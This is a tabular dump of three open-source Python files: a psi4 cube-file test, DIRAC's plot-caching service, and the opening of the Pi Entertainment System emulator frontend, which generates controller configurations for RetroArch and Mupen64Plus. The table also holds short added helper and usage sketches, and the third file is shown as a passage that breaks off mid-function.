| text | repo_name | path | language | license | size | keyword | text_hash |
|---|---|---|---|---|---|---|---|
"""
Test Python-side generation of cube files
"""
import psi4
from .utils import compare_cubes
def test_pyside_cubegen():
mol = psi4.geometry("""
O 0 0 0
H 0 0 1.795239827225189
H 1.693194615993441 0 -0.599043184453037
symmetry c1
units au
""")
psi4.core.be_quiet()
psi4.set_options({'basis': "sto-3g",
'scf_type': 'pk',
'cubeprop_tasks': ['density', 'orbitals']})
scf_e, wfn = psi4.energy('SCF', return_wfn=True, molecule=mol)
psi4.cubeprop(wfn)
cubegen = psi4.core.CubeProperties(wfn)
Dtot = wfn.Da()
Dtot.add(wfn.Db())
cubegen.compute_density(Dtot, "Dtot")
alpha_orbitals = wfn.Ca_subset("AO", "OCC").np
# select the three highest occupied orbitals
occs = alpha_orbitals[:, -3:]
occs_pm = psi4.core.Matrix.from_array(occs)
cubegen.compute_orbitals(occs_pm, [0, 2], ["1", "3"], "orbital")
assert compare_cubes("Dt.cube", "Dtot.cube")
assert compare_cubes("Psi_a_5_5-A.cube", "orbital_3_3.cube")
assert compare_cubes("Psi_a_3_3-A.cube", "orbital_1_1.cube")
| jgonthier/psi4 | tests/pytests/test_pyside_cubegen.py | Python | lgpl-3.0 | 1,124 | ["Psi4"] | 254e3fc485e61dcd509d2014cfb491d3be9f53cadbd4d88f8e6579da93192753 |
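The `compare_cubes` helper imported from `.utils` is not part of this row. A minimal sketch of what such a helper could look like, assuming the standard Gaussian cube layout and a hypothetical absolute tolerance, is:

```python
import numpy as np

def compare_cubes_sketch(expected, computed, atol=1e-5):
    """Hypothetical stand-in for the test suite's compare_cubes:
    compare the volumetric grids of two Gaussian cube files."""
    def read_volume(path):
        with open(path) as fh:
            lines = fh.readlines()
        natoms = int(lines[2].split()[0])  # line 3 starts with the atom count
        skip = 6 + abs(natoms)             # 2 comment lines + 4 header/axis lines + atom block
        if natoms < 0:
            skip += 1                      # orbital cubes add one line of MO indices
        return np.array(" ".join(lines[skip:]).split(), dtype=float)
    return np.allclose(read_volume(expected), read_volume(computed), atol=atol)
```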
""" Cache for the Plotting service plots
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__RCSID__ = "$Id$"
import os.path
import time
import threading
from DIRAC import S_OK, S_ERROR, gLogger
from DIRAC.Core.Utilities.DictCache import DictCache
from DIRAC.Core.Utilities.Graphs import graph
class PlotCache(object):
def __init__(self, plotsLocation=False):
self.plotsLocation = plotsLocation
self.alive = True
self.__graphCache = DictCache(deleteFunction=_deleteGraph)
self.__graphLifeTime = 600
self.purgeThread = threading.Thread(target=self.purgeExpired)
self.purgeThread.start()
def setPlotsLocation(self, plotsDir):
self.plotsLocation = plotsDir
for plot in os.listdir(self.plotsLocation):
if plot.find(".png") > 0:
plotLocation = "%s/%s" % (self.plotsLocation, plot)
gLogger.verbose("Purging %s" % plotLocation)
os.unlink(plotLocation)
def purgeExpired(self):
while self.alive:
time.sleep(self.__graphLifeTime)
self.__graphCache.purgeExpired()
def getPlot(self, plotHash, plotData, plotMetadata, subplotMetadata):
"""
Get the plot from the cache if it exists, otherwise generate it
"""
plotDict = self.__graphCache.get(plotHash)
if plotDict is None:
basePlotFileName = "%s/%s.png" % (self.plotsLocation, plotHash)
if subplotMetadata:
retVal = graph(plotData, basePlotFileName, plotMetadata, metadata=subplotMetadata)
else:
retVal = graph(plotData, basePlotFileName, plotMetadata)
if not retVal['OK']:
return retVal
plotDict = retVal['Value']
if plotDict['plot']:
plotDict['plot'] = os.path.basename(basePlotFileName)
self.__graphCache.add(plotHash, self.__graphLifeTime, plotDict)
return S_OK(plotDict)
def getPlotData(self, plotFileName):
filename = "%s/%s" % (self.plotsLocation, plotFileName)
try:
with open(filename, "rb") as fd:
data = fd.read()
except Exception as v:
return S_ERROR("Can't open file %s: %s" % (plotFileName, str(v)))
return S_OK(data)
def _deleteGraph(plotDict):
try:
for key in plotDict:
value = plotDict[key]
if value and os.path.isfile(value):
os.unlink(value)
except Exception:
pass
gPlotCache = PlotCache()
| yujikato/DIRAC | src/DIRAC/FrameworkSystem/Service/PlotCache.py | Python | gpl-3.0 | 2,364 | ["DIRAC"] | 726c5898ec3d4bc5a93e973675b2bc891811e69376da4c00697d9f08502b2a1b |
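A minimal usage sketch of the cache above (the hash, plot data, and metadata values are illustrative; in DIRAC they come from the Plotting service request):

```python
# illustrative values only; real plotData/plotMetadata come from the service
cache = PlotCache(plotsLocation="/tmp/dirac-plots")

plotHash = "c0ffee"  # hypothetical cache key derived from the request
result = cache.getPlot(plotHash,
                       plotData={"Site A": {0: 5, 3600: 7}},
                       plotMetadata={"title": "Jobs by site"},
                       subplotMetadata=None)
if result['OK']:
    # a second call with the same hash is served from the DictCache,
    # and the generated PNG can be streamed back to the client
    png = cache.getPlotData(result['Value']['plot'])
```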
#
# This file is part of the Pi Entertainment System (PES).
#
# PES provides an interactive GUI for games console emulators
# and is designed to work on the Raspberry Pi.
#
# Copyright (C) 2014-2021 Neil Munday (neil@mundayweb.com)
#
# PES is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PES is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with PES. If not, see <http://www.gnu.org/licenses/>.
#
from ctypes import c_int, c_char, c_char_p, c_uint32, c_void_p, byref, cast
from datetime import datetime
from pes import *
from pes.data import *
from pes.dbupdate import *
from pes.gamecontrollerdb import GameControllerDb
from pes.retroachievements import *
from pes.ui import *
import pes.event
from pes.util import *
from PIL import Image
from collections import OrderedDict
from subprocess import Popen, PIPE
from xml.etree import ElementTree
from xml.etree.ElementTree import Element, SubElement
import alsaaudio
import glob
import logging
import math
import ConfigParser
import pes.event
import random
import re
import sdl2
import sdl2.ext
import sdl2.sdlimage
import sdl2.joystick
import sdl2.video
import sdl2.render
import sdl2.sdlgfx
import sdl2.sdlttf
import sdl2.timer
import sqlite3
import sys
import threading
import time
import urllib
import urllib2
try:
import cec
except ImportError:
pass
CONSOLE_TEXTURE_ALPHA = 50
JOYSTICK_AXIS_MIN = -32766
JOYSTICK_AXIS_MAX = 32766
logging.getLogger("PIL").setLevel(logging.WARNING)
def mapAxisToKey(axis, value):
if axis == sdl2.SDL_CONTROLLER_AXIS_LEFTY:
if value > 0:
return sdl2.SDLK_DOWN
return sdl2.SDLK_UP
return None
def mapButtonToKey(button):
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN:
return sdl2.SDLK_DOWN
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP:
return sdl2.SDLK_UP
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_LEFT:
return sdl2.SDLK_LEFT
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_RIGHT:
return sdl2.SDLK_RIGHT
if button == sdl2.SDL_CONTROLLER_BUTTON_A:
return sdl2.SDLK_RETURN
if button == sdl2.SDL_CONTROLLER_BUTTON_B:
return sdl2.SDLK_BACKSPACE
if button == sdl2.SDL_CONTROLLER_BUTTON_BACK: # select button
return sdl2.SDLK_s
if button == sdl2.SDL_CONTROLLER_BUTTON_LEFTSHOULDER:
return sdl2.SDLK_PAGEUP
if button == sdl2.SDL_CONTROLLER_BUTTON_RIGHTSHOULDER:
return sdl2.SDLK_PAGEDOWN
if button == sdl2.SDL_CONTROLLER_BUTTON_GUIDE:
return sdl2.SDLK_HOME
return None
def mapRemoteButtonEvent(button):
key = None
if button == cec.CEC_USER_CONTROL_CODE_UP:
key = sdl2.SDLK_UP
elif button == cec.CEC_USER_CONTROL_CODE_DOWN:
key = sdl2.SDLK_DOWN
elif button == cec.CEC_USER_CONTROL_CODE_LEFT:
key = sdl2.SDLK_LEFT
elif button == cec.CEC_USER_CONTROL_CODE_RIGHT:
key = sdl2.SDLK_RIGHT
elif button == cec.CEC_USER_CONTROL_CODE_SELECT:
key = sdl2.SDLK_RETURN
elif button == cec.CEC_USER_CONTROL_CODE_AN_RETURN or button == cec.CECDEVICE_RESERVED2:
key = sdl2.SDLK_BACKSPACE
else:
return
e = sdl2.SDL_Event()
e.type = sdl2.SDL_KEYDOWN
e.key.keysym.sym = key
return e
def mapControlPadAxisEvent(event, eventType):
key = mapAxisToKey(event.caxis.axis, event.caxis.value)
if key:
e = sdl2.SDL_Event()
e.type = eventType
e.key.keysym.sym = key
return e
return None
def mapControlPadButtonEvent(event, eventType):
key = mapButtonToKey(event.cbutton.button)
if key:
e = sdl2.SDL_Event()
e.type = eventType
e.key.keysym.sym = key
return e
return None
class PESApp(object):
__CONTROL_PAD_BUTTON_REPEAT = 150 # delay in ms between firing events for button holds
__ICON_WIDTH = 32
__ICON_HEIGHT = 32
def __del__(self):
logging.debug("PESApp.del: deleting object")
if getattr(self, "__window", None):
logging.debug("PESApp.del: window destroyed")
sdl2.video.SDL_DestroyWindow(self.__window)
self.__window = None
#def __init__(self, dimensions, fontFile, romsDir, coverartDir, coverartSize, coverartCacheLen, iconCacheLen, badgeDir, backgroundColour, menuBackgroundColour, headerBackgroundColour, lineColour, textColour, menuTextColour, menuSelectedTextColour, lightBackgroundColour, shutdownCommmand, rebootCommand, listTimezonesCommand, getTimezoneCommand, setTimezoneCommand):
def __init__(self, dimensions, pesConfig):
super(PESApp, self).__init__()
self.__dimensions = dimensions
self.__screenSize = None
self.config = pesConfig
self.timezones = []
self.currentTimezone = None
self.__screenSaverTimeout = pesConfig.screenSaverTimeout
self.__fontSizes = pesConfig.fontSizes
ConsoleTask.SCALE_WIDTH = pesConfig.coverartSize
Thumbnail.CACHE_LEN = pesConfig.coverartCacheLen
Icon.CACHE_LEN = pesConfig.iconCacheLen
self.consoles = []
self.consoleSurfaces = {}
self.__uiObjects = [] # list of UI objects created so we can destroy them upon exit
self.lineColour = sdl2.SDL_Color(pesConfig.lineColour[0], pesConfig.lineColour[1], pesConfig.lineColour[2])
self.backgroundColour = sdl2.SDL_Color(pesConfig.backgroundColour[0], pesConfig.backgroundColour[1], pesConfig.backgroundColour[2])
self.headerBackgroundColour = sdl2.SDL_Color(pesConfig.headerBackgroundColour[0], pesConfig.headerBackgroundColour[1], pesConfig.headerBackgroundColour[2])
self.menuBackgroundColour = sdl2.SDL_Color(pesConfig.menuBackgroundColour[0], pesConfig.menuBackgroundColour[1], pesConfig.menuBackgroundColour[2])
self.menuTextColour = sdl2.SDL_Color(pesConfig.menuTextColour[0], pesConfig.menuTextColour[1], pesConfig.menuTextColour[2])
self.menuSelectedTextColour = sdl2.SDL_Color(pesConfig.menuSelectedTextColour[0], pesConfig.menuSelectedTextColour[1], pesConfig.menuSelectedTextColour[2])
self.menuSelectedBgColour = self.lineColour
self.textColour = sdl2.SDL_Color(pesConfig.textColour[0], pesConfig.textColour[1], pesConfig.textColour[2])
self.lightBackgroundColour = sdl2.SDL_Color(pesConfig.lightBackgroundColour[0], pesConfig.lightBackgroundColour[1], pesConfig.lightBackgroundColour[2])
self.__headerHeight = pesConfig.headerHeight
self.menuWidth = pesConfig.menuWidth
self.__footerHeight = 0
self.doJsToKeyEvents = True
self.__cecEnabled = False
self.retroAchievementConn = None
self.achievementUser = None
if pesConfig.retroAchievementsUserName != None and pesConfig.retroAchievementsPassword != None and pesConfig.retroAchievementsApiKey != None:
logging.debug("PESApp.__init__: RetroAchievements user = %s, apiKey = %s" % (pesConfig.retroAchievementsUserName, pesConfig.retroAchievementsApiKey))
self.retroAchievementConn = RetroAchievementConn(pesConfig.retroAchievementsUserName, pesConfig.retroAchievementsApiKey)
self.__retroAchievementsPassword = pesConfig.retroAchievementsPassword
self.setUpRetroAchievementUser()
def exit(self, rtn=0, confirm=False):
if confirm:
self.showMessageBox("Are you sure?", self.exit, rtn, False)
else:
# tidy up
logging.debug("PESApp.exit: stopping screens...")
for s in self.screens:
self.screens[s].stop()
logging.debug("PESApp.exit: purging cached surfaces...")
for console, surface in self.consoleSurfaces.iteritems():
logging.debug("PESApp.exit: unloading surface for %s..." % console)
sdl2.SDL_FreeSurface(surface)
logging.debug("PESApp.exit: tidying up...")
self.__gamepadIcon.destroy()
self.__remoteIcon.destroy()
self.__networkIcon.destroy()
if self.__screenSaverLabel:
self.__screenSaverLabel.destroy()
if self.__msgBox:
self.__msgBox.destroy()
Thumbnail.destroyTextures()
Icon.destroyTextures()
for o in self.__uiObjects:
o.destroy()
sdl2.sdlttf.TTF_CloseFont(self.headerFont)
sdl2.sdlttf.TTF_CloseFont(self.bodyFont)
sdl2.sdlttf.TTF_CloseFont(self.menuFont)
sdl2.sdlttf.TTF_CloseFont(self.titleFont)
sdl2.sdlttf.TTF_CloseFont(self.splashFont)
sdl2.sdlttf.TTF_Quit()
sdl2.sdlimage.IMG_Quit()
sdl2.SDL_Quit()
logging.info("PESApp.exit: exiting...")
sys.exit(rtn)
def getDimensions(self):
return self.__dimensions
def getGameTotal(self):
# get number of games
try:
con = sqlite3.connect(userPesDb)
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute('SELECT COUNT(*) AS `total` FROM `games`;')
row = cur.fetchone()
if row == None or row['total'] == 0:
return 0
return int(row['total'])
except sqlite3.Error, e:
pesExit("Error: %s" % e.args[0], True)
finally:
if con:
con.close()
@staticmethod
def getMupen64PlusConfigAxisValue(controller, axis, positive=True, both=False):
bind = sdl2.SDL_GameControllerGetBindForAxis(controller, axis)
if bind:
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_AXIS:
if both:
return "axis(%d-,%d+)" % (bind.value.axis, bind.value.axis)
if positive:
return "axis(%d+)" % bind.value.axis
return "axis(%d-)" % bind.value.axis
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_BUTTON:
return "button(%d)" % bind.value.button
return "\"\""
@staticmethod
def getMupen64PlusConfigButtonValue(controller, button, coreEvent=False):
bind = sdl2.SDL_GameControllerGetBindForButton(controller, button)
if bind:
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_BUTTON:
if coreEvent:
return "B%d" % bind.value.button
return "button(%d)" % bind.value.button
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_HAT:
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP:
return "hat(%d Up)" % bind.value.hat.hat
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN:
return "hat(%d Down)" % bind.value.hat.hat
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_LEFT:
return "hat(%d Left)" % bind.value.hat.hat
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_RIGHT:
return "hat(%d Right)" % bind.value.hat.hat
return "\"\""
@staticmethod
def getRetroArchConfigAxisValue(param, controller, axis, both=False):
bind = sdl2.SDL_GameControllerGetBindForAxis(controller, axis)
if bind:
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_AXIS:
if both:
return "%s_plus_axis = \"+%d\"\n%s_minus_axis = \"-%d\"\n" % (param, bind.value.axis, param, bind.value.axis)
return "%s_axis = \"+%d\"\n" % (param, bind.value.axis)
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_BUTTON:
return "%s_btn = \"%d\"\n" % (param, bind.value.button)
if both:
return "%s_plus_axis = \"nul\"\n%s_minus_axis = \"nul\"\n" % (param, param)
return "%s = \"nul\"\n" % param
@staticmethod
def getRetroArchConfigButtonValue(param, controller, button):
bind = sdl2.SDL_GameControllerGetBindForButton(controller, button)
if bind:
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_BUTTON:
return "%s_btn = \"%d\"\n" % (param, bind.value.button)
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_AXIS:
#return PESApp.getRetroArchConfigAxisValue(param, controller, bind.value.axis)
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP or button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_LEFT:
return "%s_axis = \"-%d\"\n" % (param, bind.value.axis)
return "%s_axis = \"+%d\"\n" % (param, bind.value.axis)
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_HAT:
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP:
return "%s_btn = \"h%d%s\"\n" % (param, bind.value.hat.hat, "up")
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN:
return "%s_btn = \"h%d%s\"\n" % (param, bind.value.hat.hat, "down")
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_LEFT:
return "%s_btn = \"h%d%s\"\n" % (param, bind.value.hat.hat, "left")
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_RIGHT:
return "%s_btn = \"h%d%s\"\n" % (param, bind.value.hat.hat, "right")
return "%s = \"nul\"\n" % param
@staticmethod
def getViceButtonValue(controller, joyIndex, button, pin):
bind = sdl2.SDL_GameControllerGetBindForButton(controller, button)
if bind:
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_BUTTON:
if pin >= 0:
return "%d 1 %d 1 0 %d\n" % (joyIndex, bind.value.button, pin)
return "%d 1 %d %d\n" % (joyIndex, bind.value.button, abs(pin))
elif bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_HAT:
# NOTE: not sure this is the correct way to generate hat mappings, works for XBOX 360 at least
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP:
return "%d 2 0 1 0 %d\n" % (joyIndex, abs(pin))
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN:
return "%d 2 1 1 0 %d\n" % (joyIndex, abs(pin))
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_LEFT:
return "%d 2 2 1 0 %d\n" % (joyIndex, abs(pin))
if button == sdl2.SDL_CONTROLLER_BUTTON_DPAD_RIGHT:
return "%d 2 3 1 0 %d\n" % (joyIndex, abs(pin))
return "# error: could not generate binding for button: %d\n" % button
def goBack(self):
logging.debug("PESApp.goBack: adding backspace event to event queue...")
self.screens[self.screenStack[-1]].setMenuActive(False)
e = sdl2.SDL_Event()
e.type = sdl2.SDL_KEYDOWN
e.key.keysym.sym = sdl2.SDLK_BACKSPACE
sdl2.SDL_PushEvent(e)
def initScreens(self):
logging.debug("PESApp.initScreens: initialising screens...")
self.screens["Home"] = HomeScreen(self, self.renderer, self.menuRect, self.screenRect)
self.screens["Settings"] = SettingsScreen(self, self.renderer, self.menuRect, self.screenRect)
self.screens["Play"] = PlayScreen(self, self.renderer, self.menuRect, self.screenRect, None)
consoleScreens = 0
for c in self.consoles:
if c.getGameTotal() > 0:
self.screens["Console %s" % c.getName()] = ConsoleScreen(self, self.renderer, self.menuRect, self.screenRect, c)
consoleScreens += 1
logging.debug("PESApp.initScreens: initialised %d screens of which %d are console screens" % (len(self.screens), consoleScreens))
self.screenStack = ["Home"]
def initSurfaces(self, refreshConsoles=False):
logging.debug("PESApp.initSurfaces: pre-loading console images...")
for c in self.consoles:
if refreshConsoles:
c.refresh()
consoleName = c.getName()
if c.getGameTotal() > 0 and consoleName not in self.consoleSurfaces:
image = c.getImg()
surface = sdl2.sdlimage.IMG_Load(image)
if surface == None:
logging.error("PESApp.initSurfaces: failed to load image: %s" % image)
self.exit(1)
self.consoleSurfaces[consoleName] = surface
logging.debug("PESApp.initSurfaces: pre-loaded %s surface from %s" % (consoleName, image))
def playGame(self, game):
console = game.getConsole()
# are there any files required to use this emulator?
for f in console.getRequiredFiles():
if not os.path.exists(f):
self.showMessageBox("The file %s is required to play games for %s. Please add this file and try again." % (f, console.getName()), None, None)
return
emulator = console.getEmulator()
logging.debug("PESApp.playGame: emulator is %s" % emulator)
if emulator == "RetroArch":
# note: RetroArch uses a SNES control pad button layout, SDL2 uses XBOX 360 layout!
# check joystick configs
joystickTotal = sdl2.joystick.SDL_NumJoysticks()
if joystickTotal > 0:
for i in xrange(joystickTotal):
if sdl2.SDL_IsGameController(i):
c = sdl2.SDL_GameControllerOpen(i)
if sdl2.SDL_GameControllerGetAttached(c):
# get joystick name
j = sdl2.SDL_GameControllerGetJoystick(c)
jsName = sdl2.SDL_JoystickName(j)
jsConfig = os.path.join(userRetroArchJoysticksConfDir, "%s.cfg" % jsName)
logging.debug("PESApp.playGame: checking for \"%s\" config..." % jsConfig)
logging.debug("PESApp.playGame: creating configuration file %s for %s" % (jsConfig, jsName))
vendorId, productId = getJoystickDeviceInfoFromGUID(getJoystickGUIDString(sdl2.SDL_JoystickGetDeviceGUID(i)))
with open(jsConfig, 'w') as f:
# control pad id etc.
f.write("input_device = \"%s\"\n" % jsName)
f.write("input_vendor_id = \"%s\"\n" % vendorId)
f.write("input_product_id = \"%s\"\n" % productId)
#f.write("input_driver = \"udev\"\n")
# buttons
f.write(self.getRetroArchConfigButtonValue("input_a", c, sdl2.SDL_CONTROLLER_BUTTON_B))
f.write(self.getRetroArchConfigButtonValue("input_b", c, sdl2.SDL_CONTROLLER_BUTTON_A))
f.write(self.getRetroArchConfigButtonValue("input_x", c, sdl2.SDL_CONTROLLER_BUTTON_Y))
f.write(self.getRetroArchConfigButtonValue("input_y", c, sdl2.SDL_CONTROLLER_BUTTON_X))
f.write(self.getRetroArchConfigButtonValue("input_start", c, sdl2.SDL_CONTROLLER_BUTTON_START))
f.write(self.getRetroArchConfigButtonValue("input_select", c, sdl2.SDL_CONTROLLER_BUTTON_BACK))
# shoulder buttons
f.write(self.getRetroArchConfigButtonValue("input_l", c, sdl2.SDL_CONTROLLER_BUTTON_LEFTSHOULDER))
f.write(self.getRetroArchConfigButtonValue("input_r", c, sdl2.SDL_CONTROLLER_BUTTON_RIGHTSHOULDER))
f.write(self.getRetroArchConfigAxisValue("input_l2", c, sdl2.SDL_CONTROLLER_AXIS_TRIGGERLEFT))
f.write(self.getRetroArchConfigAxisValue("input_r2", c, sdl2.SDL_CONTROLLER_AXIS_TRIGGERRIGHT))
# L3/R3 buttons
f.write(self.getRetroArchConfigButtonValue("input_l3", c, sdl2.SDL_CONTROLLER_BUTTON_LEFTSTICK))
f.write(self.getRetroArchConfigButtonValue("input_r3", c, sdl2.SDL_CONTROLLER_BUTTON_RIGHTSTICK))
# d-pad buttons
f.write(self.getRetroArchConfigButtonValue("input_up", c, sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP))
f.write(self.getRetroArchConfigButtonValue("input_down", c, sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN))
f.write(self.getRetroArchConfigButtonValue("input_left", c, sdl2.SDL_CONTROLLER_BUTTON_DPAD_LEFT))
f.write(self.getRetroArchConfigButtonValue("input_right", c, sdl2.SDL_CONTROLLER_BUTTON_DPAD_RIGHT))
# axis
f.write(self.getRetroArchConfigAxisValue("input_l_x", c, sdl2.SDL_CONTROLLER_AXIS_LEFTX, True))
f.write(self.getRetroArchConfigAxisValue("input_l_y", c, sdl2.SDL_CONTROLLER_AXIS_LEFTY, True))
f.write(self.getRetroArchConfigAxisValue("input_r_x", c, sdl2.SDL_CONTROLLER_AXIS_RIGHTX, True))
f.write(self.getRetroArchConfigAxisValue("input_r_y", c, sdl2.SDL_CONTROLLER_AXIS_RIGHTY, True))
# hot key buttons
bind = sdl2.SDL_GameControllerGetBindForButton(c, sdl2.SDL_CONTROLLER_BUTTON_GUIDE)
if bind:
f.write(self.getRetroArchConfigButtonValue("input_enable_hotkey", c, sdl2.SDL_CONTROLLER_BUTTON_GUIDE))
else:
f.write(self.getRetroArchConfigButtonValue("input_enable_hotkey", c, sdl2.SDL_CONTROLLER_BUTTON_BACK))
f.write(self.getRetroArchConfigButtonValue("input_exit_emulator", c, sdl2.SDL_CONTROLLER_BUTTON_START))
f.write(self.getRetroArchConfigButtonValue("input_save_state", c, sdl2.SDL_CONTROLLER_BUTTON_A))
f.write(self.getRetroArchConfigButtonValue("input_load_state", c, sdl2.SDL_CONTROLLER_BUTTON_B))
f.write("input_pause_toggle = \"nul\"\n")
sdl2.SDL_GameControllerClose(c)
# now set-up RetroAchievements
s = "# THIS FILE IS AUTOMATICALLY GENERATED BY PES!\n"
if self.retroAchievementConn == None:
s += "cheevos_enable = false\n"
else:
s += "cheevos_username = %s\n" % self.retroAchievementConn.getUsername()
s += "cheevos_password = %s\n" % self.__retroAchievementsPassword
s += "cheevos_enable = true\n"
if self.config.retroAchievementsHardcore:
s += "cheevos_hardcore_mode_enable = true\n"
else:
s += "cheevos_hardcore_mode_enable = false\n"
with open(userRetroArchCheevosConfFile, "w") as f:
f.write(s)
elif emulator == "Mupen64Plus":
joystickTotal = sdl2.joystick.SDL_NumJoysticks()
if joystickTotal > 0:
if not os.path.exists(userMupen64PlusConfFile):
logging.error("PESApp.playGame: could not open %s" % userMupen64PlusConfFile)
self.exit(1)
configParser = ConfigParser.SafeConfigParser()
configParser.optionxform = str # make options case sensitive
configParser.read(userMupen64PlusConfFile)
bind = sdl2.SDL_GameControllerGetBindForButton(self.__controlPad, sdl2.SDL_CONTROLLER_BUTTON_GUIDE)
if bind:
hotkey = self.getMupen64PlusConfigButtonValue(self.__controlPad, sdl2.SDL_CONTROLLER_BUTTON_GUIDE, True)
else:
hotkey = self.getMupen64PlusConfigButtonValue(self.__controlPad, sdl2.SDL_CONTROLLER_BUTTON_BACK, True)
if configParser.has_section('CoreEvents'):
configParser.set('CoreEvents', 'Joy Mapping Stop', 'J%d%s/%s' % (self.__controlPadIndex, hotkey, self.getMupen64PlusConfigButtonValue(self.__controlPad, sdl2.SDL_CONTROLLER_BUTTON_START, True)))
configParser.set('CoreEvents', 'Joy Mapping Save State', 'J%d%s/%s' % (self.__controlPadIndex, hotkey, self.getMupen64PlusConfigButtonValue(self.__controlPad, sdl2.SDL_CONTROLLER_BUTTON_A, True)))
configParser.set('CoreEvents', 'Joy Mapping Load State', 'J%d%s/%s' % (self.__controlPadIndex, hotkey, self.getMupen64PlusConfigButtonValue(self.__controlPad, sdl2.SDL_CONTROLLER_BUTTON_B, True)))
# loop through each joystick that is connected and save to button config file
# note: max of 4 control pads for this emulator
joystickTotal = sdl2.joystick.SDL_NumJoysticks()
if joystickTotal > 0:
counter = 1
for i in xrange(joystickTotal):
if sdl2.SDL_IsGameController(i):
c = sdl2.SDL_GameControllerOpen(i)
if sdl2.SDL_GameControllerGetAttached(c):
j = sdl2.SDL_GameControllerGetJoystick(c)
jsName = sdl2.SDL_JoystickName(j)
logging.debug("PESApp.playGame: generating Mupen64Plus config for joystick %d: %s" % (i, jsName))
section = 'Input-SDL-Control%d' % (i + 1)
if configParser.has_section(section):
configParser.set(section, 'device', "%d" % i)
configParser.set(section, 'name', '"%s"' % jsName)
configParser.set(section, 'plugged', 'True')
configParser.set(section, 'mouse', 'False')
configParser.set(section, 'mode', '0') # this must be set to 0 for the following values to take effect
configParser.set(section, 'DPad R', self.getMupen64PlusConfigButtonValue(c, sdl2.SDL_CONTROLLER_BUTTON_DPAD_RIGHT))
configParser.set(section, 'DPad L', self.getMupen64PlusConfigButtonValue(c, sdl2.SDL_CONTROLLER_BUTTON_DPAD_LEFT))
configParser.set(section, 'DPad D', self.getMupen64PlusConfigButtonValue(c, sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN))
configParser.set(section, 'DPad U', self.getMupen64PlusConfigButtonValue(c, sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP))
configParser.set(section, 'Start', self.getMupen64PlusConfigButtonValue(c, sdl2.SDL_CONTROLLER_BUTTON_START))
configParser.set(section, 'Z Trig', self.getMupen64PlusConfigButtonValue(c, sdl2.SDL_CONTROLLER_BUTTON_LEFTSHOULDER))
configParser.set(section, 'B Button', self.getMupen64PlusConfigButtonValue(c, sdl2.SDL_CONTROLLER_BUTTON_B))
configParser.set(section, 'A Button', self.getMupen64PlusConfigButtonValue(c, sdl2.SDL_CONTROLLER_BUTTON_A))
configParser.set(section, 'C Button R', self.getMupen64PlusConfigAxisValue(c, sdl2.SDL_CONTROLLER_AXIS_RIGHTX, positive=True))
configParser.set(section, 'C Button L', self.getMupen64PlusConfigAxisValue(c, sdl2.SDL_CONTROLLER_AXIS_RIGHTX, positive=False))
configParser.set(section, 'C Button D', self.getMupen64PlusConfigAxisValue(c, sdl2.SDL_CONTROLLER_AXIS_RIGHTY, positive=True))
configParser.set(section, 'C Button U', self.getMupen64PlusConfigAxisValue(c, sdl2.SDL_CONTROLLER_AXIS_RIGHTY, positive=False))
configParser.set(section, 'L Trig', self.getMupen64PlusConfigAxisValue(c, sdl2.SDL_CONTROLLER_AXIS_TRIGGERLEFT))
configParser.set(section, 'R Trig', self.getMupen64PlusConfigAxisValue(c, sdl2.SDL_CONTROLLER_AXIS_TRIGGERRIGHT))
configParser.set(section, 'X Axis', self.getMupen64PlusConfigAxisValue(c, sdl2.SDL_CONTROLLER_AXIS_LEFTX, both=True))
configParser.set(section, 'Y Axis', self.getMupen64PlusConfigAxisValue(c, sdl2.SDL_CONTROLLER_AXIS_LEFTY, both=True))
sdl2.SDL_GameControllerClose(c)
counter += 1
if counter > 4: # honour the max of 4 control pads noted above
break
logging.debug("PESApp.playGame: writing Mupen64Plus config to %s" % userMupen64PlusConfFile)
with open(userMupen64PlusConfFile, 'wb') as f:
configParser.write(f)
widthRe = re.compile("((window|framebuffer)[ ]+width[ ]*)=[ ]*[0-9]+")
heightRe = re.compile("((window|framebuffer)[ ]+height[ ]*)=[ ]*[0-9]+")
# now update gles2n64.conf file to use current resolution
output = ""
with open(userGles2n64ConfFile, 'r') as f:
for line in f:
result = re.sub(widthRe, r"\1=%d" % self.__screenSize[0], line)
if result != line:
output += result
else:
result = re.sub(heightRe, r"\1=%d" % self.__screenSize[1], line)
if result != line:
output += result
else:
output += line
logging.debug("PESApp.playGame: writing gles2n64 config to %s" % userGles2n64ConfFile)
